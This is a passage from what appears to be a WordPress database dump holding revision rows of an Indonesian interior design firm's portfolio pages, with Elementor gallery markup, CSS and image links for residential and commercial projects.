</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTEuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTIuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTMuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTQuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTUuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTYuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTcuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-09-22 08:37:59','2023-09-22 08:37:59','',560,'https://bauhaus.futuremediatrix.com/?p=4857',0,'revision','',0),(4858,3,'2023-09-22 08:38:28','2023-09-22 08:38:28','<h3>our recent work</h3>\n														<h2>\n								Commercial Project							</h2>\n							<p> Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-09-22 08:38:28','2023-09-22 08:38:28','',4681,'https://bauhaus.futuremediatrix.com/?p=4858',0,'revision','',0),(4859,3,'2023-09-22 08:38:28','2023-09-22 08:38:28','<h3>our recent work</h3>\n														<h2>\n								Commercial Project							</h2>\n							<p> Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transi